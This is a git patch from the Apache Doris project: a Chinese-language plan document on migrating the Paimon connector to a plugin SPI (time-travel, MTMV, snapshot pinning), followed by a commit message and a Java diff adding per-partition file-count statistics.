+ size 比对**(base `TablePartitionValues` 转换失败**抛非 skip**,不能复用)→ size 不匹配 UNPARTITIONED;通用 `getNameToPartitionItems` override 从 **rendered partitionName 解析值**(修 RAW epoch-day 丢行,源无关,base 留 MC);MTMV 单-pin 不变式测 + UT | B5a | C+T | ✅ | recon 纠偏③⑤ | +| P5-T31 | **scan-side snapshot pin(BLOCKER)**:`PaimonTableHandle` 加 snapshotId/scan-options;`PluginDrivenScanNode` 线程 pin 入 planScan;连接器 **两 resolveTable 站点**(`PaimonScanPlanProvider.planScan` + `getScanNodeProperties` JNI serialized_table)`table.copy(opts)`;改 handle 流 grep 全调用方 | B5a | C+T | ✅ | latest 一致读;B5b time-travel 复用(3 pin 站点 done) | +| P5-T32 | **AS-OF time-travel**:通用 loadSnapshot 解析 `TableSnapshot`(TIME→getSnapshotAt(millis,非数字本地-TZ parse)/VERSION+digital→getSnapshotById/VERSION+非数字→tag T33);连接器 empty→子类译 `UserException`(empty-vs-throw surface) | B5b | C+T | ✅ 连接器(B5b-2a)+fe-core(B5b-3);inert until B7 | D-040;用 T20 现有 SPI + T31 | +| P5-T33 | **tag time-travel(新 SPI)**:连接器 `getSnapshotByTag`(`tagManager().get`)→ `ConnectorMvccSnapshot` 带 `scan.tag-name` prop;scan 应用 SCAN_TAG_NAME | B5b | C+T | ✅ 连接器(B5b-2a)+fe-core(B5b-3);inert until B7 | D-040 | +| P5-T34 | **branch time-travel(新 SPI)**:连接器经 Identifier branch 分量 / branch-table load(`branchManager().branchExists` 校验);scan 读 branch 表 | B5b | C+T | ✅ 连接器(B5b-2c)+fe-core(B5b-3);inert until B7 | D-040;branch 独立 schema/snapshot;详 HANDOFF | +| P5-T35 | **incremental `@incr`(新 SPI)**:port ~180 行 `validateIncrementalReadParams` + paimon `incremental-between`/`-timestamp`/`-scan-mode` 键**入连接器**;fe-core 仅传 raw doris incr param map;scan 应用 copy opts | B5b | C+T | ✅ 连接器(B5b-2b)+fe-core(B5b-3);inert until B7 | D-040;与 tableSnapshot 互斥 | +| P5-T26 | **procedure DOC no-op**:连接器档 E2 改「NOTHING TO PORT」(非「后续」);钉死两假阳性(Spark migrate_table / iceberg expire_snapshots);记未来 seam 位置(`ExecuteActionFactory:59-62` + 可选 `ConnectorProcedureOps`/E2 P6);可选负回归(CALL/EXECUTE 仍报错)| B6 | D | ✅ | 零 code。B6 firsthand 核实:legacy `datasource/paimon/`+连接器 **0** procedure/action 文件;闭式 reject **双路**——`ALTER…EXECUTE`→`ExecuteActionFactory:59-62`(paimon=`PluginDrivenMvccExternalTable extends ExternalTable`→`else if(instanceof ExternalTable)`→`DdlException`),`CALL paimon.x`→`CallFunc:42-43`(闭式 switch default→`AnalysisException`)。doc 早于设计期已闭环(recon §3.3、connectors/paimon.md E2 行)。**neg-regression 归 B7 live-e2e**(验收 :72;结构已 guard,离线 UT 冗余故不加)| | P5-T27 | **翻闸**:paimon 入 `SPI_READY_TYPES:52` + 删 built-in case `:142` + `pluginCatalogTypeToEngine` 加 `paimon→ENGINE_PAIMON`(`:937-944`)+ 删 `PhysicalPlanTranslator` PAIMON 分支(`:781`)+import(`:71`)| B7 | C | ⏳ | gated on B2-B5 | -| P5-T28 | **翻闸 GSON 原子**:5 catalog 名 + db + table 全转 `registerCompatibleSubtype`→PluginDriven*(table→`PaimonPluginDrivenExternalTable` 非裸 base);加 5 flavor tag replay 测 | B7 | C+T | ⏳ | 漏 db→ClassCastException | +| P5-T28 | **翻闸 GSON 原子**:5 catalog 名 + db + table 全转 `registerCompatibleSubtype`→PluginDriven*(table→**通用** `PluginDrivenMvccExternalTable`,D-042,非 paimon 专类);加 5 flavor tag replay 测 | B7 | C+T | ⏳ | 漏 db→ClassCastException | | P5-T29 | **删 legacy**:`datasource/paimon/`(28) + `metacache/paimon/`(3) + 反向引用;确认零引用;验 paimon-core FE classpath 恰一份(R-004/R-007 NoClassDefFound 守)| B8 | C | ⏳ | gated on 翻闸 live 验 | | P5-T30 | post-cutover 回归:SHOW PARTITIONS + partitions TVF(预接 FE 分发现返行)/DROP·CREATE DB·TABLE/no-ENGINE CREATE/edit-log replay/MTMV 增量刷/sys-table/session-TZ 谓词不丢行 | B9 | T | ⏳ | | @@ -189,6 +194,42 @@ B6 (procedure doc no-op, 独立) │ - **用户签 B**:metadata-level wrap(保 seam 为纯 Catalog delegate);4 个 DDL op(createTable/dropTable/createDatabase/dropDatabase)各包一次 `context.executeAuthenticated`(dropDatabase 的 enumerate-loop+cascade 整体一个 scope,UGI doAs 可重入,行为等价 legacy);**read 路径仍不 wrap**(B 仅 DDL 域,未回改 B2)。`executeAuthenticated` 默认 no-op → 离线测不受影响,正确性须 live-e2e 验。 - **遗留不一致(记录)**:read 路径未 per-call wrap(B2 决策),DDL 已 wrap(D7=B)——若 live-e2e 证 Kerberized **读**也需 call-time doAs,则 read 路径须补 wrap(B2 回改,非 B3 范围)。归入翻闸前 live-e2e authenticator 门。 +### D-040 / D-041 / D-042 — B5 设计定夺(✅ 签字 2026-06-10;understand 6-lens workflow + 主线 firsthand 核读纠偏) + +> B5 启动 understand workflow(6 read-only lens 验 plan 前提)+ 主线 firsthand 核读,纠偏 T22-T25 多处 plan 前提,用户签 3 决策。下文为 B5 权威设计(覆盖原 T21-T25 plan 备注,按 Rule 7 择 code 真相)。 + +**D-040 — 时间旅行 scope → ✅ 采纳「全 parity(含 tag/branch/@incr)」**。legacy 支持 `FOR TIME/VERSION AS OF`(snapshot-id/timestamp/tag) + `@branch` + `@incr`(incremental-read)。T20 SPI 仅 `getSnapshotById`/`getSnapshotAt(timestamp)`——**tag/branch/incremental 零 SPI 面**,须新增。统一模型:全部归结为 **paimon scan-options map(`Table.copy(opts)`)或 branch-table load**;连接器解析、`ConnectorMvccSnapshot.properties`(或 handle)承载、scan-pin 线程入两 resolveTable 站点应用。`@incr` 的 ~180 行 `validateIncrementalReadParams` 移入**连接器**(产 paimon 键),fe-core 仅传 raw doris param map。empty-if-none → 子类译回 `UserException`(否则坏 version 静默 latest)。 + +**D-041 — T21 at-snapshot listPartitions → ✅ 采纳「drop,list at latest」**。legacy **从不**在非-latest snapshot 列分区(time-travel 路径用 `PaimonPartitionInfo.EMPTY`);`Catalog.listPartitions(Identifier)` snapshot-agnostic,真 at-snapshot 须新 seam(`DataTable.newSnapshotReader().partitionEntries()`+`InternalRowPartitionComputer`)**超 legacy parity**。故 T21 仅「list at the begin-query pin 的 snapshot(MTMV=latest)」=现有 `catalogOps.listPartitions` 即可;接受两-SDK-call 微 race(legacy 单调用原子,doc 记之)。**不建新 SDK seam**。 + +**D-042 — MTMV/MVCC 实现归宿 → ✅ 采纳「通用 `PluginDrivenMvccExternalTable`(capability-selected),NO paimon-specific fe-core 类」**。用户否决 plan T22 的 `PaimonPluginDrivenExternalTable`:**违反 SPI 原则**(core 不应有特定源实现类,等于改名 legacy `PaimonExternalTable`)。改用**源无关** `PluginDrivenMvccExternalTable extends PluginDrivenExternalTable implements MTMVRelatedTableIf, MTMVBaseTableIf, MvccTable`(可复用 iceberg/hudi);catalog 按连接器 `SUPPORTS_MVCC_SNAPSHOT` capability 选择实例化(jdbc/es/mc/trino 仍用裸 `PluginDrivenExternalTable` 不受影响=隔离爆炸半径);新类 GSON 注册(drop 原「table→PaimonPluginDrivenExternalTable」B7 任务)。全方法 SPI-delegate,唯一 paimon-specific(date render / incremental 译 / tag·branch resolve)留**连接器**。 + +**recon 纠偏(code-truth,已并入下方 task 表)**:① `ConnectorMvccSnapshotAdapter` 是 **zero-callers 非 zero-ctor**(已建,直接用)。② T23 漏 `MvccTable.loadSnapshot` + 2-arg `getTableSnapshot(MTMVRefreshContext,Optional)` 重载(两个 abstract 必实现);`getTableSnapshot` 返**真 pinned snapshotId** 非 `(-1)`(-1 仅空表);`getPartitionColumns(Optional)` 已被 base 继承;`getPartitionType`→**LIST**;`getPartitionColumnNames`→lowercase。③ 子类 override `getNameToPartitionItems`:读 **pin**(base 忽略 snapshot 参 live-list latest)+ 从 **rendered partitionName** 解析值(`HiveUtil.toPartitionValues`,源无关、修 base 喂 RAW epoch-day 致 DATE 分区静默丢行/抛;同时覆盖普通 paimon 分区裁剪非仅 MTMV;base 留 MC 不动)。④ 6-arg `planScan`/`requiredPartitions` **非** paimon 需求(PaimonScanPlanProvider 纯谓词裁剪 scan-correct);随 key-flip 的硬需求是 RAW→RENDERED。⑤ T25 `isPartitionInvalid` **不能复用 base `TablePartitionValues`**(转换失败**抛 CacheException 非 skip-and-count**);须 port legacy `PaimonUtil.generatePartitionInfo` per-partition try/catch + size 比对→UNPARTITIONED。⑥ T19 guard **已 live**(translator `PhysicalPlanTranslator:793-796` 喂 snapshot/scanParams 给所有 FileQueryScanNode);dormant 的是普通表 time-travel READ。⑦ T24 字段表剔除 `PaimonPartition`($partitions sys-table 行 decoy 未用);通用 wrapper 持 `ConnectorMvccSnapshot` + materialized `nameToPartitionItem`/`nameToLastModifiedMillis`/`listedCount`。⑧ L6 确认 `ConnectorPartitionInfo.lastModifiedMillis`(=`Partition.lastFileCreationTime()`,T08) byte-parity 正确;R-high 可靠性 parity-inherited 非 B5 新增。 + +**BLOCKER(不在原 task 表)= scan-side snapshot pin**:`ConnectorScanPlanProvider.planScan` 无 snapshot 参、`PaimonTableHandle` 无 snapshotId、**两个** resolveTable 站点(`planScan` + `getScanNodeProperties` JNI serialized_table)。不接 pin 则任何 time-travel + MTMV 一致读静默读 LATEST。修=handle 带 snapshotId/scan-options,两站点都 `table.copy(opts)`;改 fe-core handle 流必 grep 全 `resolveTable`/`getTableHandle`(同 B4 教训)。 + +**B5 拆 B5a→B5b(均 gate cutover B7;通用类 inert until B7 路由,同 T20 范式,unit-test 直构造)**: +- **B5a = MTMV core + 分区激活**(D2=A 心):连接器 emit `partition_columns`(替 `partition_keys`);通用 `PluginDrivenMvccExternalTable` + capability 工厂 + GSON;`loadSnapshot`(latest pin + materialize rendered 分区一次);通用 fe-core MVCC snapshot wrapper(T24 corrected);MTMV 方法全套(T23 corrected);`isPartitionInvalid` parity + RAW→RENDERED override + 单-pin 测(T25 corrected);scan-pin(latest 一致读)。 +- **B5b = explicit time-travel 全 parity**:AS-OF(snapshot-id+timestamp,子类解析 TableSnapshot+empty→UserException) / tag(新 SPI) / branch(新 SPI,Identifier branch 分量/branch-table load) / incremental(validate+paimon 键移入连接器,fe-core 传 raw param map);scan-options 经 `ConnectorMvccSnapshot.properties`/handle 线程两 resolveTable 站点。 + +### D-043 / D-044 — B5b 设计定夺(✅ 签字 2026-06-10;understand recon(4-lens workflow)+ 主线 firsthand 核读 PaimonExternalTable/PaimonScanNode/PaimonUtil + 全 SPI/schema-cache 路径) + +> B5b 启动 read-only recon(legacy AS-OF/tag/branch/incremental + SDK seam + planner→loadSnapshot 流 + schema-cache 机制)+ 主线 firsthand 核读,纠偏后用户签 2 决策。下文为 B5b 权威设计(覆盖原 T32-T35 plan 备注简略版)。 + +**D-043 — schema-at-pinned-snapshot → ✅ 采纳「include in B5b(全 parity)」**。recon 证实**真 divergence**:legacy `getPartitionColumns(snapshot)` + `getFullSchema()` 经 `getPaimonSchemaCacheValue(MvccUtil.getSnapshotFromContext(this))` 解析 **pinned schemaId** 的 schema(schemaManager().schema(schemaId)),通用类返 LATEST。仅跨 schema 演进的旧 snapshot 才异(无演进则等价;time-travel 分区 items 恒 EMPTY 故 pruning 不受影响,唯列集/类型异)。**实现走轻量路径(避开 schema-cache 基建改动)**:① legacy 只 override `getSchemaCacheValue()`(no-arg,读 context pin),`getFullSchema`/`getPartitionColumns` 经其自动流通 → 通用类同样**只 override `getSchemaCacheValue()`**(context pin 在 → 返 snapshot 携带的 pinned schema,否则 super=latest)。② pinned schema **在 loadSnapshot 一次性解析**(连接器 `getTableSchema(session,handle,snapshot)` snapshot-aware 重载,按 snapshot.schemaId 解析)并**装入 `PluginDrivenMvccSnapshot`**(per-query,非 schemaId-keyed 跨查询 cache;perf-only 偏差,结果 parity,doc 记)。**不建** `PluginDrivenSchemaCacheKey`/keyed `initSchema`/`ExternalMetaCache` 改动。 + +**D-044 — time-travel SPI 形状 → ✅ 采纳「unified `resolveTimeTravel(spec)`」**。统一一个 SPI 方法 + `ConnectorTimeTravelSpec` 值类型(kind∈{SNAPSHOT_ID,TIMESTAMP,TAG,BRANCH,INCREMENTAL} + stringValue + digital + incrementalParams),连接器内部分发全模式(含 **timestamp 串在连接器解析** = paimon `DateTimeUtils.parseTimestampData(v,3,sessionTZ)` byte-parity,TZ 取 `ConnectorSession.getTimeZone()` [[catalog-spi-connector-session-tz-gotcha]])。**fe-core 仅做源无关分发/抽取**(TableSnapshot type+digital 判定、TableScanParams tag/branch/incr 判定、`extractBranchOrTagName`、mutual-exclusion、empty→UserException 译)。现有 inert `getSnapshotAt(millis)`/`getSnapshotById(id)`(T20,零其他消费方)→ **被 resolveTimeTravel 取代,删之**。 + +**B5b SPI 面(净增)**:① `ConnectorTimeTravelSpec`(新值类型)。② `ConnectorMetadata.resolveTimeTravel(session,handle,spec)→Optional`(default empty)。③ `ConnectorMvccSnapshot` 加 `schemaId`(long,default -1) 字段。④ `ConnectorTableOps.getTableSchema(session,handle,ConnectorMvccSnapshot)` snapshot-aware 重载(default → latest 重载;`getTableSchema` 实声明在 `ConnectorTableOps` 非 `ConnectorSchemaOps`)。⑤ `applySnapshot` 改:thread 全 `snapshot.getProperties()`(scan-options map)入 `handle.scanOptions`;properties 空 → fallback `scan.snapshot-id=snapshotId`(B5a latest-pin parity)。**incremental null-reset 键**(`scan.snapshot-id=null`/`scan.mode=null`)连接器侧**剔除**(fresh base table 上 no-op,且 `ConnectorMvccSnapshot.properties` builder 拒 null);doc benign divergence。**branch SDK 机制**(`CoreOptions.BRANCH` scan-option vs catalog 3-arg branch-load)impl 时按 paimon 版本核定。 + +**B5b 拆 B5b-1→B5b-4(subagent-driven,build-on-previous,shared dirty tree,无 commit)**: +- **B5b-1 = SPI 面(纯 additive,树仍编译)**(fe-connector-api):`ConnectorTimeTravelSpec` + `resolveTimeTravel` default + `ConnectorMvccSnapshot.schemaId` + `getTableSchema(...,snapshot)` 重载 + `applySnapshot` 全-properties 契约 doc。**不删** inert `getSnapshotAt/getSnapshotById`(删之会断 `PaimonConnectorMetadata` 的 `@Override` 编译;退役并入 B5b-2 一起改 api+connector+测)。值类型 + default 行为测。 +- **B5b-2 = 连接器解析 + 退役死 seam**(fe-connector-paimon + fe-connector-api 删法):`PaimonConnectorMetadata.resolveTimeTravel`(5 模式分发)+ port `validateIncrementalReadParams`(~180 行)+ PaimonUtil 解析助手(timestamp/tag/branch/isDigitalString)入连接器 + 新 `PaimonCatalogOps` seam(getSnapshotByTag/branchExists+load/schema-at-schemaId)+ `getTableSchema(snapshot)` impl + `applySnapshot` 全-properties + 扩 Recording/FakePaimonTable + **退役 `getSnapshotAt/getSnapshotById`(api+connector+测一并删,零消费方)**。全模式测 + incremental mutation-kill + tag/branch + schema-at-snapshot。 +- **B5b-3 = fe-core 通用分发 + schema-at-snapshot**(fe-core):`loadSnapshot` 替 placeholder(抽 spec + mutual-excl + empty→UserException + EMPTY 分区 maps + pinned schema 装入)+ `PluginDrivenMvccSnapshot` 加 schemaId+pinnedSchema + `getSchemaCacheValue()` context-pin override。分发/mutual-excl/empty/schema-at-snapshot 测。 +- **B5b-4 = holistic**(merged build + 3-lens parity/adversarial/scope 复审 + cleanup)。 + +> **执行态(2026-06-10,未提交)**:B5b-2 实拆 **2a/2b/2c**。**B5b-1 ✅**(审 PASS)。**B5b-2a ✅**(snapshot-id/timestamp/tag + schema-at-snapshot + applySnapshot 全-properties + 退役 getSnapshotAt/ById;双审 + TZ-alias BLOCKER fix=fail-loud)。**B5b-2b ✅**(@incr 180 行 validate port;审 PASS_WITH_NITS,仅测覆盖 NIT 待补)。**B5b-2c ✅**(branch time-travel 连接器侧;implement→4-lens clean-room 并行复审[spec/adversarial/test-mutation/scope]→fix→主线独立 verify,全绿 `Tests run:179`,无 blocker。branch=**handle 身份变更**:`PaimonTableHandle.branchName`[纳入 identity] + `withBranch`[**绝不 copy transient base Table**=避静默读 base] + `Identifier(db,table,branch)` 3-arg load 集中于**单 seam `PaimonTableResolver.resolve`**[覆盖全 6+2 站点] + `branchExists` seam[FileStoreTable cast,非-FST→graceful false] + carry via **properties sentinel `CoreOptions.BRANCH.key()`**[applySnapshot 先于 generic 路检测→withBranch] + empty-branch schemaId=-1[legacy 0L,schema 同=benign])。**B5b-3 ✅**(fe-core 通用分发 + schema-at-snapshot;implement→4-lens clean-room 并行复审[spec/adversarial/test-mutation/scope]+**逐 MAJOR/BLOCKER 对抗证伪**→test-hardening fix→主线独立 verify,全绿 `PluginDriven*` `Tests run:140 Failures:0 Errors:0`[MvccExternalTableTest 33],checkstyle 0,**复审 0 产线 defect**。`loadSnapshot` 替 placeholder=源无关 `toTimeTravelSpec` 分发[TIME→timestamp/VERSION+digital→snapshotId/非digital→tag/isTag/isBranch/incrementalRead→getMapParams] + mutual-excl + `resolveTimeTravel` empty→`notFoundMessage`[snapshot/tag/branch byte-parity;timestamp text-diverge=doc'd] + **apply-before-getTableSchema**[branch-aware handle→at-snapshot schema] + EMPTY 分区 maps;`PluginDrivenMvccSnapshot` 加 nullable `pinnedSchema`+`getSchemaId`[3-arg ctor 委派 null=B5a latest 不变];`getSchemaCacheValue()` override[context-pin→pinnedSchema else `getLatestSchemaCacheValue()` seam];`PluginDrivenExternalTable.initSchema` 抽 `toSchemaCacheValue` 共享 helper[byte-identical]。错误走 `RuntimeException`[loadSnapshot 无 checked throws,仿 legacy/Iceberg precedent])。**B5b-4 ✅**(holistic:merged-build 三模块全绿 + 3-lens clean-room 复审[parity/adversarial/scope,Workflow 并行+逐 BLOCKER/MAJOR 对抗证伪]→**查出 1 BLOCKER(RD-1)+1 MINOR(RD-2)**→用户签 fix-now+full-parity→implement→独立 fix-review[3-lens+falsify,**APPROVE 0 defect**]→final build 全绿。**RD-1(BLOCKER,已修)**=partitioned time-travel + 分区谓词→**0 行静默丢数**:连接器 B5 起发 `partition_columns`→FE 视 paimon 为分区表,但 time-travel pin 的分区-item map 恒 EMPTY→`PruneFileScanPartition` 对空 map 剪谓词→`isPruned=true`+空集→`PluginDrivenScanNode.getSplits` 短路(529-531)零 split。legacy 同样 EMPTY+isPruned=true,但 legacy `PaimonScanNode.getSplits` 无短路(走 SDK 谓词下推)故返行→**真 divergence**。修=`resolveRequiredPartitions` 加 `totalPartitionNum==0`(空 universe=time-travel pin)→scan-all(null)→planScan 跑(paimon 弃 requiredPartitions、纯谓词下推);MaxCompute 真剪零(totalPartitionNum>0)仍短路=parity 不变。**RD-2(MINOR,已修,full-parity)**=`@incr` pin EMPTY 分区 map,legacy `@incr` 落 `getLatestSnapshotCacheValue`=LATEST 分区+LATEST schema→修=`loadSnapshot` INCREMENTAL 分支列 latest 分区+`pinnedSchema=null`(抽 `listLatestPartitions` helper 复用 materializeLatest,byte-identical),余 4 kind 不变。另顺修 FIX-3(`PaimonScanPlanProvider` stale class-doc "FE 当 paimon 非分区")+`PaimonConnectorMetadata:436` 错注释。2 新意图测[empty-universe scans-all mutation-kill / @incr lists-latest mutation-kill]。**known divergence**(=D1/D2 既录)+1 新 doc'd:MaxCompute 零分区表 scan-all vs legacy 无条件短路=**row-equivalent**(planScan getFileNum<=0 返空)。详 `plan-doc/HANDOFF.md` + [[catalog-spi-p5-b5b-design]]。 + --- ## 风险 / 开放问题 From fc7a8758fbc5e8217bece8252c1665507cbe8fd5 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 11 Jun 2026 11:06:01 +0800 Subject: [PATCH 014/128] [P5-B7+fixes] (connector+fe-core) P5 paimon B7 cutover + 8 fullpath-review fixes MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Combines all previously-uncommitted P5 paimon work into one commit (per request). 8 fullpath-review fixes (BLOCKERs + key MAJORs) — connector + SPI + fe-core bridge: - FIX-STORAGE-CREDS: applyStorageConfig translates canonical s3.*/oss.*/AWS_* -> fs.s3a./fs.oss. (+DLF region->OSS endpoint) - FIX-NATIVE-PARTVAL: per-type serializePartitionValue + session TZ (LTZ only); binary/varbinary drops the partition map (no [B@hash garbage) - FIX-TZ-ALIAS: full legacy ZoneId.SHORT_IDS + 4 Doris overrides alias map (CST/PST/EST now resolve for FOR TIME AS OF datetime strings) - FIX-TABLE-STATS: getTableStatistics override + PaimonCatalogOps.rowCount seam (normal AND system tables, via the sys-aware resolveTable) - FIX-CPP-READER: honor enable_paimon_cpp_reader -> native DataSplit.serialize so BE's PaimonCppReader can decode the split - FIX-READ-NOTNULL: mapFields forces read-path columns nullable (legacy parity) - FIX-HMS-CONFRES: new ConnectorContext.loadHiveConfResources hook + 2-arg buildHmsHiveConf file-base merge (external hive-site.xml reaches the metastore) - FIX-REST-VENDED: new ConnectorContext.vendStorageCredentials hook + scan-props vended AWS_* overlay (REST per-table tokens reach BE) Also carries the previously-uncommitted B7 core cutover + D-045/D-046 restores. Tests: fe-connector-paimon 213 pass / 0 fail / 1 skip (live-gated); fe-core compiles + DefaultConnectorContextVendTest 2/0. Each fix's root-cause/patch/UT and impl-time corrections are in plan-doc/tasks/designs/P5-fix--design.md. Excluded from this commit: regression-test/conf/regression-conf.groovy (plaintext Aliyun keys, pending scrub) and scratch dirs (.audit-scratch/, conf.cmy/, META-INF/, *.bak). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../connector/api/ConnectorCapability.java | 13 +- .../connector/api/ConnectorPartitionInfo.java | 17 +- .../api/ConnectorPartitionInfoTest.java | 77 +++ .../paimon/PaimonCatalogFactory.java | 168 +++++- .../connector/paimon/PaimonCatalogOps.java | 22 + .../connector/paimon/PaimonConnector.java | 15 +- .../paimon/PaimonConnectorMetadata.java | 120 +++- .../paimon/PaimonScanPlanProvider.java | 184 +++++- .../connector/paimon/FakePaimonTable.java | 6 +- .../paimon/PaimonCatalogFactoryTest.java | 202 +++++++ .../PaimonConnectorMetadataMvccTest.java | 101 +++- .../PaimonConnectorMetadataPartitionTest.java | 30 + ...PaimonConnectorMetadataStatisticsTest.java | 139 +++++ .../paimon/PaimonConnectorMetadataTest.java | 61 ++ .../paimon/PaimonHmsConfResWiringTest.java | 65 +++ .../PaimonPartitionValueRenderTest.java | 127 +++++ .../paimon/PaimonScanPlanProviderTest.java | 295 ++++++++++ .../paimon/RecordingConnectorContext.java | 17 + .../paimon/RecordingPaimonCatalogOps.java | 18 + .../doris/connector/spi/ConnectorContext.java | 36 ++ .../java/org/apache/doris/catalog/Env.java | 31 + .../connector/DefaultConnectorContext.java | 55 ++ .../doris/datasource/CatalogFactory.java | 9 +- .../datasource/PluginDrivenExternalTable.java | 32 +- .../PluginDrivenSchemaCacheValue.java | 17 + .../translator/PhysicalPlanTranslator.java | 4 - .../rules/analysis/UserAuthentication.java | 8 + .../plans/commands/ShowPartitionsCommand.java | 65 ++- .../plans/commands/info/CreateTableInfo.java | 17 +- .../apache/doris/persist/gson/GsonUtils.java | 34 +- .../DefaultConnectorContextVendTest.java | 70 +++ .../PaimonGsonCompatReplayTest.java | 120 ++++ ...luginDrivenExternalTablePartitionTest.java | 44 ++ .../PluginDrivenMvccExternalTableTest.java | 3 +- ...ShowPartitionsCommandPluginDrivenTest.java | 76 +++ plan-doc/HANDOFF.md | 80 +-- .../P5-paimon-fixes-design.workflow.js | 134 +++++ .../P5-paimon-fullpath-review-2026-06-11.md | 533 ++++++++++++++++++ .../P5-paimon-fullpath-review.workflow.js | 528 +++++++++++++++++ plan-doc/task-list-P5-paimon-fixes.md | 26 + plan-doc/tasks/P5-paimon-migration.md | 6 +- .../designs/P5-fix-FIX-CPP-READER-design.md | 197 +++++++ .../designs/P5-fix-FIX-HMS-CONFRES-design.md | 168 ++++++ .../P5-fix-FIX-NATIVE-PARTVAL-design.md | 213 +++++++ .../designs/P5-fix-FIX-READ-NOTNULL-design.md | 129 +++++ .../designs/P5-fix-FIX-REST-VENDED-design.md | 174 ++++++ .../P5-fix-FIX-STORAGE-CREDS-design.md | 248 ++++++++ .../designs/P5-fix-FIX-TABLE-STATS-design.md | 169 ++++++ .../designs/P5-fix-FIX-TZ-ALIAS-design.md | 160 ++++++ 49 files changed, 4912 insertions(+), 151 deletions(-) create mode 100644 fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/ConnectorPartitionInfoTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataStatisticsTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonHmsConfResWiringTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonPartitionValueRenderTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextVendTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PaimonGsonCompatReplayTest.java create mode 100644 plan-doc/reviews/P5-paimon-fixes-design.workflow.js create mode 100644 plan-doc/reviews/P5-paimon-fullpath-review-2026-06-11.md create mode 100644 plan-doc/reviews/P5-paimon-fullpath-review.workflow.js create mode 100644 plan-doc/task-list-P5-paimon-fixes.md create mode 100644 plan-doc/tasks/designs/P5-fix-FIX-CPP-READER-design.md create mode 100644 plan-doc/tasks/designs/P5-fix-FIX-HMS-CONFRES-design.md create mode 100644 plan-doc/tasks/designs/P5-fix-FIX-NATIVE-PARTVAL-design.md create mode 100644 plan-doc/tasks/designs/P5-fix-FIX-READ-NOTNULL-design.md create mode 100644 plan-doc/tasks/designs/P5-fix-FIX-REST-VENDED-design.md create mode 100644 plan-doc/tasks/designs/P5-fix-FIX-STORAGE-CREDS-design.md create mode 100644 plan-doc/tasks/designs/P5-fix-FIX-TABLE-STATS-design.md create mode 100644 plan-doc/tasks/designs/P5-fix-FIX-TZ-ALIAS-design.md diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorCapability.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorCapability.java index 771ae263a3739a..c5e89dfd2cadae 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorCapability.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorCapability.java @@ -87,5 +87,16 @@ public enum ConnectorCapability { * {@link ConnectorTableOps#getColumnsFromQuery} to provide column metadata * for arbitrary SQL queries passed through to the remote data source.

    */ - SUPPORTS_PASSTHROUGH_QUERY + SUPPORTS_PASSTHROUGH_QUERY, + /** + * Indicates the connector exposes per-partition statistics (record count, on-disk size, + * file count) via {@link ConnectorTableOps#listPartitions}. + * + *

    {@code SHOW PARTITIONS} renders a rich multi-column result (Partition / PartitionKey / + * RecordCount / FileSizeInBytes / FileCount) for connectors declaring this capability, instead + * of the single partition-name column used by connectors that only implement + * {@code listPartitionNames}. This is distinct from {@link #SUPPORTS_STATISTICS}, which is + * table-level statistics for the optimizer.

    + */ + SUPPORTS_PARTITION_STATS } diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorPartitionInfo.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorPartitionInfo.java index fa95ae44e6977d..fe345d0b620bce 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorPartitionInfo.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorPartitionInfo.java @@ -35,6 +35,7 @@ public final class ConnectorPartitionInfo { private final long rowCount; private final long sizeBytes; private final long lastModifiedMillis; + private final long fileCount; /** * Backward-compatible constructor. Numeric stats fields are set to @@ -44,13 +45,13 @@ public ConnectorPartitionInfo(String partitionName, Map partitionValues, Map properties) { this(partitionName, partitionValues, properties, - UNKNOWN, UNKNOWN, UNKNOWN); + UNKNOWN, UNKNOWN, UNKNOWN, UNKNOWN); } public ConnectorPartitionInfo(String partitionName, Map partitionValues, Map properties, - long rowCount, long sizeBytes, long lastModifiedMillis) { + long rowCount, long sizeBytes, long lastModifiedMillis, long fileCount) { this.partitionName = Objects.requireNonNull( partitionName, "partitionName"); this.partitionValues = partitionValues == null @@ -62,6 +63,7 @@ public ConnectorPartitionInfo(String partitionName, this.rowCount = rowCount; this.sizeBytes = sizeBytes; this.lastModifiedMillis = lastModifiedMillis; + this.fileCount = fileCount; } public String getPartitionName() { @@ -91,6 +93,11 @@ public long getLastModifiedMillis() { return lastModifiedMillis; } + /** @return number of data files in the partition, or {@link #UNKNOWN}. */ + public long getFileCount() { + return fileCount; + } + @Override public boolean equals(Object o) { if (this == o) { @@ -103,6 +110,7 @@ public boolean equals(Object o) { return rowCount == that.rowCount && sizeBytes == that.sizeBytes && lastModifiedMillis == that.lastModifiedMillis + && fileCount == that.fileCount && partitionName.equals(that.partitionName) && partitionValues.equals(that.partitionValues) && properties.equals(that.properties); @@ -111,7 +119,7 @@ public boolean equals(Object o) { @Override public int hashCode() { return Objects.hash(partitionName, partitionValues, properties, - rowCount, sizeBytes, lastModifiedMillis); + rowCount, sizeBytes, lastModifiedMillis, fileCount); } @Override @@ -119,6 +127,7 @@ public String toString() { return "ConnectorPartitionInfo{name='" + partitionName + "', values=" + partitionValues + ", rowCount=" + rowCount - + ", sizeBytes=" + sizeBytes + "}"; + + ", sizeBytes=" + sizeBytes + + ", fileCount=" + fileCount + "}"; } } diff --git a/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/ConnectorPartitionInfoTest.java 